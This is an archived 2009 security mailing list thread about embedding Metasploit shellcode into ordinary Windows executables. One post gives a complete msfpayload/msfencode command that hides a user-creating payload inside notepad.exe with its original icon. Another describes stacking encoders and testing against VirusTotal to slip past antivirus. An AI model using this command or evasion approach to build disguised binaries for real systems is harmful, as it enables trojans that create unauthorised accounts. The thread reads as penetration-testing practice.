PaulDotCom mailing list archives
Manually embedding shellcode into executables
From: dimitrios at gmail.com (Dimitrios Kapsalis)
Date: Tue, 1 Dec 2009 20:25:12 -0600
I haven't had much success with the msfpayload, seems that most virus scans pick up the payload. Even tried to use a couple types of encoding stacked on top of each other without much luck. Play with it and then test the exe against virustotal.com.

On Tue, Dec 1, 2009 at 4:17 PM, Adrian Crenshaw <irongeek at irongeek.com> wrote:

> Ok, I just read Rob's post here: http://www.room362.com/blog/2009/11/3/metasploit-blends-in-new-msfpayloadencode.html and checked my exes. Since both are the same size, I'm guessing it's not working as a binder but as a "cloaker" of sorts.
>
> Adrian
>
> On Tue, Dec 1, 2009 at 5:12 PM, Adrian Crenshaw <irongeek at irongeek.com> wrote:
>
>> Ok, I did this:
>>
>> $ msfpayload windows/adduser user=test pass=test exitfunc=seh R | msfencode -t exe -x notepad.exe -o MYNEWFILE.exe
>>
>> The exe made has the same icon and metadata as the original. The payload runs since the "test" account is created, but notepad never comes up, so it does not make much of a binder. Any ideas?
>>
>> Adrian